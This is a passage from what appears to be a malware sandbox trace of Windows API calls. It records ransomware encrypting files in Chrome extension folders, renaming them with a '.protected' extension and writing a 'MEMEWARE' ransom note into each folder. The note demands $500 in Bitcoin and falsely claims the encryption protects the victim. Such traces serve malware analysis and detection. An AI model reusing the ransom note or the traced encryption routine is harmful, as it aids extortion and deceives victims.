Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json") returned 159 [0081.208] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.208] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json") returned 159 [0081.208] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.208] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x289, lpOverlapped=0x0) returned 1 [0081.210] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd77, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.210] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x289, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x289, lpOverlapped=0x0) returned 1 [0081.210] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.210] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.210] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.210] CloseHandle (hObject=0x168) returned 1 [0081.210] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json.protected") returned 169 [0081.210] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\messages.json.protected")) returned 1 [0081.211] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.211] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.211] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\RESTORE_FILES.txt") returned 163 [0081.211] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sv\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 
0x164 [0081.212] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.212] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.213] lstrlenA (lpString="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") returned 684 [0081.213] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0081.213] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.213] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.213] CloseHandle (hObject=0x164) returned 1 [0081.213] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.213] lstrcmpiW (lpString1="th", lpString2="Windows") returned -1 [0081.213] lstrcmpiW (lpString1="th", lpString2="Program Files") returned 1 [0081.213] lstrcmpiW (lpString1="th", lpString2="Program Files (x86)") returned 1 [0081.213] lstrcmpiW (lpString1="th", lpString2="$Recycle.bin") returned 1 [0081.213] lstrcmpiW (lpString1="th", lpString2="System Volume Information") returned 1 [0081.213] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th") returned 145 [0081.213] lstrcmpW (lpString1="th", lpString2=".") returned 1 [0081.213] lstrcmpW (lpString1="th", lpString2="..") returned 1 [0081.213] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\*") returned 147 [0081.213] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 
0x47bc10 [0081.214] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.214] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.214] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.214] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.214] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.214] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\.") returned 147 [0081.214] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.214] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.214] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.214] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.214] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.214] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.214] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.214] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\..") returned 148 [0081.214] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.214] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.214] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.214] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.214] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.214] lstrcmpiW (lpString1="messages.json", 
lpString2="Program Files (x86)") returned -1 [0081.214] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.214] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.214] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json") returned 159 [0081.214] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.214] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.214] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.214] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.214] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.216] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json") returned 159 [0081.216] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.216] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json") returned 159 [0081.216] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.216] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json") returned 159 [0081.216] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.216] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x44b, lpOverlapped=0x0) returned 1 [0081.218] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffbb5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.218] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x44b, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x44b, lpOverlapped=0x0) returned 1 [0081.218] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.218] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.218] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.218] CloseHandle (hObject=0x168) returned 1 [0081.218] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json.protected") returned 169 [0081.218] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\messages.json.protected")) returned 1 [0081.219] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.219] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.219] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\RESTORE_FILES.txt") returned 163 [0081.220] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\th\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 
0x164 [0081.220] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.220] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.221] lstrlenA (lpString="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") returned 684 [0081.221] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, 
lpOverlapped=0x0) returned 1 [0081.221] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.221] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0081.221] CloseHandle (hObject=0x164) returned 1 [0081.221] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.221] lstrcmpiW (lpString1="tr", lpString2="Windows") returned -1 [0081.222] lstrcmpiW (lpString1="tr", lpString2="Program Files") returned 1 [0081.222] lstrcmpiW (lpString1="tr", lpString2="Program Files (x86)") returned 1 [0081.222] lstrcmpiW (lpString1="tr", lpString2="$Recycle.bin") returned 1 [0081.222] lstrcmpiW (lpString1="tr", lpString2="System Volume Information") returned 1 [0081.222] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr") returned 145 [0081.222] lstrcmpW (lpString1="tr", lpString2=".") returned 1 [0081.222] lstrcmpW (lpString1="tr", lpString2="..") returned 1 [0081.222] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\*") returned 147 [0081.222] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 
0x47bc10 [0081.222] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.222] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.222] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.222] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.222] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.222] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\.") returned 147 [0081.222] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.222] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.222] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.222] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.222] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.222] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.222] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.222] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\..") returned 148 [0081.222] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.223] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.223] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.223] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.223] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.223] lstrcmpiW (lpString1="messages.json", 
lpString2="Program Files (x86)") returned -1 [0081.223] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.223] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.223] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json") returned 159 [0081.223] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.223] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.223] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.223] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.223] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.224] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json") returned 159 [0081.224] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.224] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json") returned 159 [0081.224] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.224] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json") returned 159 [0081.224] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.224] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x28a, lpOverlapped=0x0) returned 1 [0081.226] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffd76, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.226] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x28a, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x28a, lpOverlapped=0x0) returned 1 [0081.226] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.226] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.226] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.227] CloseHandle (hObject=0x168) returned 1 [0081.227] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
